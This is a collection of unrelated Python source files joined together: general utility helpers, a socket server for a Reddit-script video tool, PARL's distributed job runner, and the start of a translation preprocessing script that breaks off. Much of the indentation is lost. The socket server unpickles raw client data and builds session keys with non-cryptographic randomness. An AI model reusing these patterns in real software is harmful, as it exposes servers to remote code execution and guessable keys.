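    a = {"model": {"lr": 0.1, "layers": 2}, "seed": 1}
    b = {"model": {"lr": 0.2}, "data": "train.csv"}
    merged = merge_dicts(a, b, conflict_operation=lambda old, new: new)
    assert merged["model"] == {"lr": 0.2, "layers": 2}
    assert merged["data"] == "train.csv"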
def natural_sort(seq):
def _alphanum(x):
        return [int(c) if c.isdigit() else c.lower()
                for c in re.split('([0-9]+)', x)]
return sorted(seq, key=_alphanum)
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
"""
Return random string of size
@param size: int Length of returned string
@param chars: list List of allowed chars
@return: str Random string ex: "AJD45S"
"""
return ''.join(random.choice(chars) for _ in range(size))
# -------------------------------------- Parallelizations, Multiprocessing --------------------------------------------
def parallelwork(fn, inputq, outputq):
"""Run unary `fn` in parallel on data taken from `inputq` and save results to `outputq`.
:param fn: function
:param inputq: multiprocessing.Queue
:param outputq: multiprocessing.Queue
"""
while True:
i, x = inputq.get()
if i is None:
break
try:
outputq.put((i, fn(x)))
except StopIteration:
outputq.put((None, None))
def parallelize(fn, iterator, workers, queuesize_per_worker=None):
"""Parallize function call on items from the iterator.
:param fn: function
:param iterator: iterator
:param workers: int
:param queuesize_per_worker: int
"""
# Try using imap
try:
# start n worker processes
with Pool(processes=workers) as pool:
# Use chunk size if got as parameter
if queuesize_per_worker is not None:
i = pool.imap(fn, iterator, queuesize_per_worker)
else:
i = pool.imap(fn, iterator)
for res in i:
yield res
    except Exception:
        # TODO: this Queue-based fallback should probably only run when Pool is unavailable.
if queuesize_per_worker is not None:
inputq = Queue(queuesize_per_worker * workers)
else:
inputq = Queue()
outputq = Queue()
processes = [Process(target=parallelwork, args=(fn, inputq, outputq))
for worker in range(workers)]
for process in processes:
process.daemon = True
process.start()
sent = [inputq.put((i, x)) for i, x in enumerate(iterator)]
[inputq.put((None, None)) for worker in range(workers)]
for n in range(len(sent)):
i, x = outputq.get()
if i is None:
continue
yield x
[process.join() for process in processes]
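# Illustrative usage, not part of the original module: `fn` has to be defined at module
# level so the Pool-based path can pickle it for the worker processes. Results from the
# Queue-based fallback may arrive out of order, hence the sorted() before comparing.
# Both function names below are hypothetical.
def _square(x):
    return x * x

def _parallelize_example():
    results = list(parallelize(_square, range(8), workers=2))
    assert sorted(results) == [0, 1, 4, 9, 16, 25, 36, 49]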
def log_method(log_fnc=logging.debug, arguments=True):
"""Decorator to log the method's call with timing.
:param log_fnc: {(str)->None} logging function (e.g. logger.debug or print)
:param arguments: bool - True if you want to include arguments, False if not
:returns: decorator
"""
def wrap(fnc):
def inner(*args, **kwargs):
result = None
log_fnc(u"Method call: {}.{}".format(fnc.__module__, fnc.__name__))
if arguments:
log_fnc(u"Arguments: args: {!s}, kwargs: {!s}".format(args, kwargs))
result = fnc(*args, **kwargs)
log_fnc(u"Method finished: {}.{}".format(fnc.__module__, fnc.__name__))
return result
return inner
return wrap
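# Illustrative usage, not part of the original module: decorating a function so every call,
# its arguments and its completion are reported through the chosen logging function.
# The decorated function below is hypothetical.
@log_method(log_fnc=print, arguments=True)
def _add(a, b):
    return a + b
# Calling _add(1, 2) would print the call line, the argument line and the "finished" line,
# then return 3.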
def get_logger(name):
logger = logging.getLogger(name)
logger.addHandler(logging.NullHandler())
return logger
class PartialFormatter(string.Formatter):
"""
    Fills formatting fields that have no provided value with the `missing` placeholder.
Code from: https://stackoverflow.com/a/20250018/6579599
"""
def __init__(self, missing='~', bad_fmt='!'):
self.missing, self.bad_fmt = missing, bad_fmt
def get_field(self, field_name, args, kwargs):
# Handle a key not found
try:
val = super(PartialFormatter, self).get_field(field_name, args, kwargs)
# Python 3, 'super().get_field(field_name, args, kwargs)' works
except (KeyError, AttributeError):
val = None, field_name
return val
def format_field(self, value, spec):
# handle an invalid format
        if value is None:
            return self.missing
try:
return super(PartialFormatter, self).format_field(value, spec)
except ValueError:
if self.bad_fmt is not None:
return self.bad_fmt
else:
raise
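# Illustrative usage, not part of the original module: missing fields fall back to '~' and
# invalid format specs fall back to '!' instead of raising. The wrapper name is hypothetical.
def _partial_formatter_example():
    fmt = PartialFormatter()
    assert fmt.format("{name} scored {score}", name="exp1") == "exp1 scored ~"
    assert fmt.format("{val:.2f}", val="not-a-number") == "!"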
def exception_safe(fcn, return_on_exception=None):
"""
Function wrapper that handles exception by printing in log
:param function fcn: Function to wrap
    :param Any return_on_exception: What should be returned if an exception occurs
:return Any: If no exception returns the same as `fcn`, otherwise returns `return_on_exception`
"""
def wrapper(*args, **kwargs):
try:
return fcn(*args, **kwargs)
except Exception as e:
logging.warning("Exception in {}: {}".format(fcn.__name__, e))
return return_on_exception
return wrapper
|
socketserverhandler.py
|
import socket as pythonsocket
from threading import Thread
from time import sleep
import datetime
import pickle
import database
import reddit
import string
import random
import settings
socket = pythonsocket.socket(pythonsocket.AF_INET, pythonsocket.SOCK_STREAM)
def startServer():
database.beginDataBaseConnection()
database.initDatabase()
server_address = (settings.server_location, int(settings.server_port))
print('Starting server on %s port %s' % server_address)
socket.setsockopt(pythonsocket.SOL_SOCKET, pythonsocket.SO_REUSEADDR, 1)
socket.settimeout(None)
socket.bind(server_address)
socket.listen(5)
thread = Thread(target=waitConnect)
thread.start()
servertick = Thread(target=serverTick)
servertick.start()
clients = []
class Client():
def __init__(self, connection, address, authorized):
self.connection = connection
self.address = address
self.authorized = authorized
self.key = None
self.username = None
self.editingScript = None
self.disconnect = False
self.lastPing = datetime.datetime.now()
self.scriptsComplete = []
def waitConnect():
print("Server wait client thread started")
while True:
sleep(0.1)
connection, address = socket.accept()
print("%s Client connected on %s" % (datetime.datetime.now(), address))
client = Client(connection, address, False)
clients.append(client)
clientthread = Thread(target=clientTick, args=[clients[len(clients) - 1]])
clientthread.start()
def getAllClientConnections():
return [client.connection for client in clients]
def sendToAllClients(payload):
for client_con in getAllClientConnections():
try:
sendToClient(client_con, payload)
except Exception:
print("couldn't send to connection %s" % client_con)
def clientTick(client):
print("Server tick thread started for client")
HEADERSIZE = 10
while True:
if client.disconnect:
print("%s SERVER user %s disconnected" % (datetime.datetime.now(), repr(client.username)))
break
full_msg = b''
new_msg = True
while True:
try:
client_connection = client.connection
buf = client_connection.recv(2048)
if new_msg:
try:
msglen = int(buf[:HEADERSIZE])
except ValueError:
print("client disconnect error")
# happens when client disconnects
break
new_msg = False
full_msg += buf
except ConnectionResetError:
print("%s SERVER user %s connecton reset error" % (datetime.datetime.now(), repr(client.username)))
break
download_size = len(full_msg) - HEADERSIZE
if download_size == msglen:
if download_size > 100000:
print(
"%s SERVER received large message (%s)" % (
datetime.datetime.now(), str(download_size / 1000000) + "MB"))
try:
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
except EOFError:
print("%s SERVER user %s disconnected" % (datetime.datetime.now(), repr(client.username)))
break
new_msg = True
full_msg = b""
if not client.authorized:
if "login-attempt" == incomingdata[0]:
print("%s SERVER user %s login attempt" % (datetime.datetime.now(), repr(incomingdata[1])))
username = incomingdata[1]
password = incomingdata[2]
login = (database.login(username, password))
online_users = database.getOnlineUsers()
if username in online_users:
print("%s SERVER user %s already logged in" % (
datetime.datetime.now(), repr(incomingdata[1])))
sendToClient(client_connection, ("login-success", False, None))
else:
if login:
key = generateKey()
client.key = key
client.username = username
sendToClient(client_connection, ("login-success", True, key))
client.authorized = True
print("%s SERVER user %s logged in" % (datetime.datetime.now(), repr(incomingdata[1])))
database.updateUserStatus(username, "ONLINE")
else:
sendToClient(client_connection, ("login-success", False, None))
print("%s SERVER user %s wrong password" % (
datetime.datetime.now(), repr(incomingdata[1])))
else:
if "request-scripts" == incomingdata[1]:
print("%s SERVER user %s request scripts" % (datetime.datetime.now(), repr(client.username)))
if incomingdata[0] == client.key:
print("%s SERVER sending scripts to user %s" % (
datetime.datetime.now(), repr(client.username)))
amount = incomingdata[2]
filter = incomingdata[3]
if filter == "ups":
data = database.getScripts(amount, "ups")
sendToClient(client_connection, ("scripts-return", data))
elif filter == "latest posts":
data = database.getScripts(amount, "timecreated")
sendToClient(client_connection, ("scripts-return", data))
elif filter == "recently added":
data = database.getScripts(amount, "timegathered")
sendToClient(client_connection, ("scripts-return", data))
elif filter == "comments":
data = database.getScripts(amount, "num_comments")
sendToClient(client_connection, ("scripts-return", data))
pass
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "edit-script" == incomingdata[1]:
scriptno = incomingdata[2]
print("%s SERVER user %s request to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
if incomingdata[0] == client.key:
script_status = database.getScriptStatus(scriptno)
if script_status == "RAW":
print("%s SERVER allowing user %s to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
client.editingScript = scriptno
database.updateScriptStatus("EDITING", client.username, scriptno)
sendToClient(client.connection, ('edit-script-success', True, scriptno))
sendToAllClients(('script-status-update', scriptno, "EDITING", client.username))
print("%s SERVER sending all clients (%s) status update for %s" % (
datetime.datetime.now(), len(getAllClientConnections()), scriptno))
elif script_status == "EDITING":
print("%s SERVER refusing user %s to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
sendToClient(client.connection, ('edit-script-success', False, scriptno))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "upload-video" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
video_generator_payload = incomingdata[3]
script_status = database.getScriptStatus(scriptno)
if script_status == "EDITING":
if scriptno == client.editingScript:
print("%s SERVER allowing user %s to upload script number %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
if database.uploadVid(video_generator_payload, scriptno):
database.updateScriptStatus("COMPLETE", client.username, scriptno)
sendToClient(client_connection, ('script-upload-success', True, scriptno))
client.scriptsComplete.append(scriptno)
client.editingScript = None
else:
sendToClient(client_connection, ('script-upload-success', False, scriptno))
sendToAllClients(('script-status-update', scriptno, "COMPLETE", client.username))
else:
print(
"%s SERVER user %s script number %s does not match what client is editing %s" % (
datetime.datetime.now(), repr(client.username), scriptno,
client.editingScript))
else:
print("%s SERVER user %s script status is %s" % (
datetime.datetime.now(), repr(client.username), script_status))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "quit-editing" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
if client.editingScript == scriptno:
database.updateScriptStatus("RAW", None, scriptno)
print("%s SERVER user %s quit editing %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
sendToAllClients(('script-status-update', scriptno, "RAW", None))
client.editingScript = None
else:
print("%s SERVER user %s not editing script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "flag-scripts" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
flagtype = incomingdata[3]
database.updateScriptStatus(flagtype, client.username, scriptno)
print("%s SERVER user %s flagging script %s as %s" % (
datetime.datetime.now(), repr(client.username), scriptno, flagtype))
sendToAllClients(('script-status-update', scriptno, flagtype, client.username))
client.editingScript = None
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "add-script" == incomingdata[1]:
if incomingdata[0] == client.key:
url = incomingdata[2]
try:
post = reddit.getPostByUrl(url)
if post is not None:
print("%s SERVER user %s added script %s" % (
datetime.datetime.now(), repr(client.username), post.submission_id))
database.addSubmission(post)
sendToClient(client_connection, ('add-script-success', True, "Successfully added script"))
else:
print("%s SERVER user %s attempted to add script that already exists" % (
datetime.datetime.now(), repr(client.username)))
sendToClient(client_connection,
('add-script-success', False, "Script already in database"))
except Exception as e:
print("%s SERVER user %s error attempting to add script %s" % (
datetime.datetime.now(), repr(client.username), url))
sendToClient(client_connection,
('add-script-success', False, "An error occured trying to add the script"))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "PING" == incomingdata[1]:
if incomingdata[0] == client.key:
client.lastPing = datetime.datetime.now()
print("%s SERVER sending PONG to %s" % (datetime.datetime.now(), repr(client.username)))
sendToClient(client.connection, ('PONG',))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
                if (datetime.datetime.now() - client.lastPing).total_seconds() > 120:
                    print("%s SERVER no PING from %s in 2 minutes. Disconnecting" % (
                        datetime.datetime.now(), repr(client.username)))
                    client.disconnect = True
print("%s SERVER Thread shutting down" % datetime.datetime.now())
client.disconnect = True
break
def sendToClient(client_connection, payloadattachment):
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
client_connection.sendall(payload)
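# Illustrative sketch, not part of the original module: sendToClient() and clientTick()
# share a simple wire format -- a fixed-width, left-aligned 10-byte decimal length header
# followed by a pickled payload. The helper below round-trips one frame in memory; the
# function name and sample payload are hypothetical.
def _framing_example():
    HEADERSIZE = 10
    body = pickle.dumps(("PING", "some-key"))
    frame = bytes(f"{len(body):<{HEADERSIZE}}", 'utf-8') + body
    msglen = int(frame[:HEADERSIZE])  # parse the header, as clientTick() does
    assert pickle.loads(frame[HEADERSIZE:HEADERSIZE + msglen]) == ("PING", "some-key")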
def handleCompletedScripts():
while True:
pass
def serverTick():
global clients
while True:
sleep(0.1)
scriptsbeingedited = database.getScriptEditInformation() # gets information of scripts with EDITING status
        scriptsbeingeditedby = [editedby[2] for editedby in scriptsbeingedited]  # usernames currently marked as editing a script
online_users = database.getOnlineUsers()
clientIndexToRemove = []
if clients:
for i, client in enumerate(clients):
                if client.username in scriptsbeingeditedby:
                    indexOfScript = scriptsbeingeditedby.index(client.username)
scriptno = scriptsbeingedited[indexOfScript][0]
# set script client was editing to raw
if not client.editingScript == scriptno and scriptno not in client.scriptsComplete:
print("%s SERVER setting status of script %s to RAW because client is not editing it" % (
datetime.datetime.now(), scriptno))
database.updateScriptStatus("RAW", None, scriptno)
for client_con in getAllClientConnections():
sendToClient(client_con, ('script-status-update', scriptno, "RAW", None))
if client.disconnect: # if client disconnects set script to raw
clientIndexToRemove.append(i)
else:
            if scriptsbeingedited:
                for script in scriptsbeingedited:
                    database.updateScriptStatus("RAW", None, script[0])
                    for client_con in getAllClientConnections():
                        sendToClient(client_con, ('script-status-update', script[0], "RAW", None))
                print("%s SERVER setting status of all scripts to RAW as there are no clients." % (
                    datetime.datetime.now()))
if online_users:
for user in online_users:
database.updateUserStatus(user, None)
print("%s SERVER removing online status for %s as there are no clients" % (
datetime.datetime.now(), user))
if clientIndexToRemove:
for index in clientIndexToRemove:
print("deleted clients")
try:
if clients[index].username is not None:
database.updateUserStatus(clients[index].username, None)
for client in clients:
if not client.disconnect:
sendToClient(client.connection,
('script-status-update', clients[index].editingScript, "RAW", None))
except IndexError:
pass
try:
new_clients = []
for i in range(len(clients)):
if not clients[index] == clients[i]:
new_clients.append(clients[i])
clients = new_clients
except IndexError:
print("could not update client list")
if scriptsbeingedited:
pass
def generateKey():
"""Generate a random string of letters, digits and special characters """
password_characters = string.ascii_letters + string.digits + string.punctuation
return ''.join(random.choice(password_characters) for i in range(10))
|
job.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Fix cloudpickle compatible problem we known.
import compatible_trick
import os
os.environ['CUDA_VISIBLE_DEVICES'] = ''
os.environ['XPARL'] = 'True'
import argparse
import cloudpickle
import pickle
import psutil
import re
import sys
import tempfile
import threading
import time
import traceback
import zmq
from multiprocessing import Process, Pipe
from parl.utils import to_str, to_byte, get_ip_address, logger
from parl.utils.communication import loads_argument, loads_return,\
dumps_argument, dumps_return
from parl.remote import remote_constants
from parl.utils.exceptions import SerializeError, DeserializeError
from parl.remote.message import InitializedJob
from parl.remote.utils import load_remote_class, redirect_stdout_to_file
class Job(object):
"""Base class for the job.
After establishing connection with the remote object, the job will
create a remote class instance locally and enter an infinite loop
in a separate process, waiting for commands from the remote object.
"""
def __init__(self, worker_address, log_server_address):
"""
Args:
worker_address(str): worker_address for sending job information(e.g, pid)
Attributes:
pid (int): Job process ID.
max_memory (float): Maximum memory (MB) can be used by each remote instance.
"""
self.max_memory = None
self.job_address_receiver, job_address_sender = Pipe()
self.job_id_receiver, job_id_sender = Pipe()
self.worker_address = worker_address
self.log_server_address = log_server_address
self.job_ip = get_ip_address()
self.pid = os.getpid()
self.run_job_process = Process(
target=self.run, args=(job_address_sender, job_id_sender))
self.run_job_process.start()
"""
NOTE:
In Windows, it will raise errors when creating threading.Lock before starting multiprocess.Process.
"""
self.lock = threading.Lock()
self._create_sockets()
process = psutil.Process(self.pid)
self.init_memory = float(process.memory_info()[0]) / (1024**2)
self.run_job_process.join()
with self.lock:
self.kill_job_socket.send_multipart(
[remote_constants.KILLJOB_TAG,
to_byte(self.job_address)])
try:
_ = self.kill_job_socket.recv_multipart()
except zmq.error.Again as e:
pass
os._exit(0)
def _create_sockets(self):
"""Create five sockets for each job in main process.
(1) job_socket(functional socket): sends job_address and heartbeat_address to worker.
(2) ping_heartbeat_socket: replies ping message of client.
(3) worker_heartbeat_socket: replies heartbeat message of worker.
(4) client_heartbeat_socket: replies heartbeat message of client.
(5) kill_job_socket: sends a command to the corresponding worker to kill the job.
"""
# wait for another process to create reply socket
self.job_address = self.job_address_receiver.recv()
self.job_id = self.job_id_receiver.recv()
self.ctx = zmq.Context()
# create the job_socket
self.job_socket = self.ctx.socket(zmq.REQ)
self.job_socket.connect("tcp://{}".format(self.worker_address))
# a thread that reply ping signals from the client
ping_heartbeat_socket, ping_heartbeat_address = self._create_heartbeat_server(
timeout=False)
ping_thread = threading.Thread(
target=self._reply_ping, args=(ping_heartbeat_socket, ))
ping_thread.setDaemon(True)
ping_thread.start()
# a thread that reply heartbeat signals from the worker
worker_heartbeat_socket, worker_heartbeat_address = self._create_heartbeat_server(
)
worker_thread = threading.Thread(
target=self._reply_worker_heartbeat,
args=(worker_heartbeat_socket, ))
worker_thread.setDaemon(True)
# a thread that reply heartbeat signals from the client
client_heartbeat_socket, client_heartbeat_address = self._create_heartbeat_server(
)
self.client_thread = threading.Thread(
target=self._reply_client_heartbeat,
args=(client_heartbeat_socket, ))
self.client_thread.setDaemon(True)
# sends job information to the worker
initialized_job = InitializedJob(
self.job_address, worker_heartbeat_address,
client_heartbeat_address, ping_heartbeat_address, None, self.pid,
self.job_id, self.log_server_address)
self.job_socket.send_multipart(
[remote_constants.NORMAL_TAG,
cloudpickle.dumps(initialized_job)])
message = self.job_socket.recv_multipart()
worker_thread.start()
tag = message[0]
assert tag == remote_constants.NORMAL_TAG
# create the kill_job_socket
kill_job_address = to_str(message[1])
self.kill_job_socket = self.ctx.socket(zmq.REQ)
self.kill_job_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_TIMEOUT_S * 1000)
self.kill_job_socket.connect("tcp://{}".format(kill_job_address))
def _check_used_memory(self):
"""Check if the memory used by this job exceeds self.max_memory."""
stop_job = False
if self.max_memory is not None:
process = psutil.Process(self.pid)
used_memory = float(process.memory_info()[0]) / (1024**2)
if used_memory > self.max_memory + self.init_memory:
stop_job = True
return stop_job
def _reply_ping(self, socket):
"""Create a socket server that reply the ping signal from client.
This signal is used to make sure that the job is still alive.
"""
message = socket.recv_multipart()
max_memory = to_str(message[1])
if max_memory != 'None':
self.max_memory = float(max_memory)
socket.send_multipart([remote_constants.HEARTBEAT_TAG])
self.client_thread.start()
socket.close(0)
def _create_heartbeat_server(self, timeout=True):
"""Create a socket server that will raises timeout exception.
"""
heartbeat_socket = self.ctx.socket(zmq.REP)
if timeout:
heartbeat_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_RCVTIMEO_S * 1000)
heartbeat_socket.linger = 0
heartbeat_port = heartbeat_socket.bind_to_random_port(addr="tcp://*")
heartbeat_address = "{}:{}".format(self.job_ip, heartbeat_port)
return heartbeat_socket, heartbeat_address
def _reply_client_heartbeat(self, socket):
"""Create a socket that replies heartbeat signals from the client.
If the job losts connection with the client, it will exit too.
"""
while True:
try:
message = socket.recv_multipart()
stop_job = self._check_used_memory()
socket.send_multipart([
remote_constants.HEARTBEAT_TAG,
to_byte(str(stop_job)),
to_byte(self.job_address)
])
                if stop_job:
logger.error(
"Memory used by this job exceeds {}. This job will exist."
.format(self.max_memory))
time.sleep(5)
socket.close(0)
os._exit(1)
except zmq.error.Again as e:
logger.warning(
"[Job] Cannot connect to the client. This job will exit and inform the worker."
)
break
socket.close(0)
with self.lock:
self.kill_job_socket.send_multipart(
[remote_constants.KILLJOB_TAG,
to_byte(self.job_address)])
try:
_ = self.kill_job_socket.recv_multipart()
except zmq.error.Again as e:
pass
logger.warning("[Job]lost connection with the client, will exit")
os._exit(1)
def _reply_worker_heartbeat(self, socket):
"""create a socket that replies heartbeat signals from the worker.
If the worker has exited, the job will exit automatically.
"""
while True:
try:
message = socket.recv_multipart()
socket.send_multipart([remote_constants.HEARTBEAT_TAG])
except zmq.error.Again as e:
logger.warning("[Job] Cannot connect to the worker{}. ".format(
self.worker_address) + "Job will quit.")
break
socket.close(0)
os._exit(1)
def wait_for_files(self, reply_socket, job_address):
"""Wait for python files from remote object.
When a remote object receives the allocated job address, it will send
the python files to the job. Later, the job will save these files to a
        temporary directory and add that temporary directory to Python's module
        search path and working directory.
Args:
        reply_socket (socket): main socket to accept commands of the remote object.
job_address (String): address of reply_socket.
Returns:
A temporary directory containing the python files.
"""
message = reply_socket.recv_multipart()
tag = message[0]
if tag == remote_constants.SEND_FILE_TAG:
pyfiles = pickle.loads(message[1])
# save python files to temporary directory
envdir = tempfile.mkdtemp()
for file, code in pyfiles['python_files'].items():
file = os.path.join(envdir, file)
with open(file, 'wb') as code_file:
code_file.write(code)
# save other files to current directory
for file, content in pyfiles['other_files'].items():
# create directory (i.e. ./rom_files/)
if '/' in file:
try:
sep = os.sep
recursive_dirs = os.path.join(*(file.split(sep)[:-1]))
recursive_dirs = os.path.join(envdir, recursive_dirs)
os.makedirs(recursive_dirs)
except OSError as e:
pass
file = os.path.join(envdir, file)
with open(file, 'wb') as f:
f.write(content)
reply_socket.send_multipart([remote_constants.NORMAL_TAG])
return envdir
else:
logger.error("NotImplementedError:{}, received tag:{}".format(
                job_address, tag))
raise NotImplementedError
def wait_for_connection(self, reply_socket):
"""Wait for connection from the remote object.
The remote object will send its class information and initialization
arguments to the job, these parameters are then used to create a
local instance in the job process.
Args:
        reply_socket (socket): main socket to accept commands of the remote object.
Returns:
A local instance of the remote class object.
"""
message = reply_socket.recv_multipart()
tag = message[0]
obj = None
if tag == remote_constants.INIT_OBJECT_TAG:
try:
file_name, class_name, end_of_file = cloudpickle.loads(
message[1])
cls = load_remote_class(file_name, class_name, end_of_file)
args, kwargs = cloudpickle.loads(message[2])
logfile_path = os.path.join(self.log_dir, 'stdout.log')
with redirect_stdout_to_file(logfile_path):
obj = cls(*args, **kwargs)
except Exception as e:
traceback_str = str(traceback.format_exc())
error_str = str(e)
logger.error("traceback:\n{}".format(traceback_str))
reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + "\ntraceback:\n" + traceback_str)
])
return None
reply_socket.send_multipart([remote_constants.NORMAL_TAG])
else:
logger.error("Message from job {}".format(message))
reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
b"[job]Unkonwn tag when tried to receive the class definition"
])
raise NotImplementedError
return obj
def run(self, job_address_sender, job_id_sender):
"""An infinite loop waiting for a new task.
Args:
job_address_sender(sending end of multiprocessing.Pipe): send job address of reply_socket to main process.
"""
ctx = zmq.Context()
# create the reply_socket
reply_socket = ctx.socket(zmq.REP)
job_port = reply_socket.bind_to_random_port(addr="tcp://*")
reply_socket.linger = 0
job_ip = get_ip_address()
job_address = "{}:{}".format(job_ip, job_port)
job_id = job_address.replace(':', '_') + '_' + str(int(time.time()))
self.log_dir = os.path.expanduser('~/.parl_data/job/{}'.format(job_id))
logger.set_dir(self.log_dir)
logger.info(
"[Job] Job {} initialized. Reply heartbeat socket Address: {}.".
format(job_id, job_address))
job_address_sender.send(job_address)
job_id_sender.send(job_id)
try:
# receive source code from the actor and append them to the environment variables.
envdir = self.wait_for_files(reply_socket, job_address)
sys.path.insert(0, envdir)
os.chdir(envdir)
obj = self.wait_for_connection(reply_socket)
assert obj is not None
self.single_task(obj, reply_socket, job_address)
except Exception as e:
logger.error(
"Error occurs when running a single task. We will reset this job. \nReason:{}"
.format(e))
traceback_str = str(traceback.format_exc())
logger.error("traceback:\n{}".format(traceback_str))
def single_task(self, obj, reply_socket, job_address):
"""An infinite loop waiting for commands from the remote object.
Each job will receive two kinds of message from the remote object:
1. When the remote object calls a function, job will run the
function on the local instance and return the results to the
remote object.
2. When the remote object is deleted, the job will quit and release
related computation resources.
Args:
        reply_socket (socket): main socket to accept commands of the remote object.
job_address (String): address of reply_socket.
"""
while True:
message = reply_socket.recv_multipart()
tag = message[0]
if tag in [
remote_constants.CALL_TAG, remote_constants.GET_ATTRIBUTE,
remote_constants.SET_ATTRIBUTE,
remote_constants.CHECK_ATTRIBUTE
]:
try:
if tag == remote_constants.CHECK_ATTRIBUTE:
attr = to_str(message[1])
if attr in obj.__dict__:
reply_socket.send_multipart([
remote_constants.NORMAL_TAG,
dumps_return(True)
])
else:
reply_socket.send_multipart([
remote_constants.NORMAL_TAG,
dumps_return(False)
])
elif tag == remote_constants.CALL_TAG:
function_name = to_str(message[1])
data = message[2]
args, kwargs = loads_argument(data)
# Redirect stdout to stdout.log temporarily
logfile_path = os.path.join(self.log_dir, 'stdout.log')
with redirect_stdout_to_file(logfile_path):
ret = getattr(obj, function_name)(*args, **kwargs)
ret = dumps_return(ret)
reply_socket.send_multipart(
[remote_constants.NORMAL_TAG, ret])
elif tag == remote_constants.GET_ATTRIBUTE:
attribute_name = to_str(message[1])
logfile_path = os.path.join(self.log_dir, 'stdout.log')
with redirect_stdout_to_file(logfile_path):
ret = getattr(obj, attribute_name)
ret = dumps_return(ret)
reply_socket.send_multipart(
[remote_constants.NORMAL_TAG, ret])
elif tag == remote_constants.SET_ATTRIBUTE:
attribute_name = to_str(message[1])
attribute_value = loads_return(message[2])
logfile_path = os.path.join(self.log_dir, 'stdout.log')
with redirect_stdout_to_file(logfile_path):
setattr(obj, attribute_name, attribute_value)
reply_socket.send_multipart(
[remote_constants.NORMAL_TAG])
else:
pass
except Exception as e:
# reset the job
error_str = str(e)
logger.error(error_str)
if type(e) == AttributeError:
reply_socket.send_multipart([
remote_constants.ATTRIBUTE_EXCEPTION_TAG,
to_byte(error_str)
])
raise AttributeError
elif type(e) == SerializeError:
reply_socket.send_multipart([
remote_constants.SERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
raise SerializeError
elif type(e) == DeserializeError:
reply_socket.send_multipart([
remote_constants.DESERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
raise DeserializeError
else:
traceback_str = str(traceback.format_exc())
logger.error("traceback:\n{}".format(traceback_str))
reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + "\ntraceback:\n" +
traceback_str)
])
break
# receive DELETE_TAG from actor, and stop replying worker heartbeat
elif tag == remote_constants.KILLJOB_TAG:
reply_socket.send_multipart([remote_constants.NORMAL_TAG])
logger.warning("An actor exits and this job {} will exit.".
format(job_address))
break
else:
logger.error(
"The job receives an unknown message: {}".format(message))
raise NotImplementedError
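# Illustrative sketch, not part of the original module: the heartbeat servers created by
# _create_heartbeat_server() are plain ZeroMQ REP sockets, and their peers are REQ sockets
# that send a tag and wait for the echoed reply within RCVTIMEO. The function name, address
# argument and timeout below are hypothetical placeholders, not PARL's actual client code.
def _heartbeat_probe_sketch(heartbeat_address, timeout_ms=10000):
    ctx = zmq.Context()
    sock = ctx.socket(zmq.REQ)
    sock.setsockopt(zmq.RCVTIMEO, timeout_ms)
    sock.linger = 0
    sock.connect("tcp://{}".format(heartbeat_address))
    try:
        sock.send_multipart([remote_constants.HEARTBEAT_TAG])
        reply = sock.recv_multipart()  # raises zmq.error.Again on timeout
        return reply[0] == remote_constants.HEARTBEAT_TAG
    except zmq.error.Again:
        return False
    finally:
        sock.close(0)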
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--worker_address", required=True, type=str, help="worker_address")
parser.add_argument(
"--log_server_address",
required=True,
type=str,
help="log_server_address, address of the log web server on worker")
args = parser.parse_args()
job = Job(args.worker_address, args.log_server_address)
|
pangeamt_files_preprocess.py
|
#!/usr/bin/env python
import os
import json
import argparse
from multiprocessing import Process
from pangeamt_nlp.processors import Pipeline
# Parallel preprocess of train, dev and test files.
def _get_parser():
parser = argparse.ArgumentParser(description='Preprocess file.')
parser.add_argument('config', help="Path to config file")
parser.add_argument('data', help="Path to data folder")
parser.add_argument('src', help='Src lang')
parser.add_argument('tgt', help='Tgt lang')
return parser
def _load_pipelines(config, src_lang, tgt_lang):
# Loads the main config for the source files and the secondary config
# for the target files
with open(config, 'r') as config_file:
config = json.load(config_file)
print('Loading pipelines..')
pipelines = {
src_lang:\
Pipeline(config['pipeline_config'], config['src_lang'],\
config['tgt_lang']),
tgt_lang:\
Pipeline(config['pipeline_config_tgt'], config['tgt_lang'])
}
print('Pipelines loaded..')
return pipelines
def _process(lang, pipelines):
pipeline = pipelines[lang]
files = ['train', 'dev', 'test']
for file in files:
path = f'{args.data}/{file}.{lang}'
# Checks if the file exists
if os.path.isfile(path):
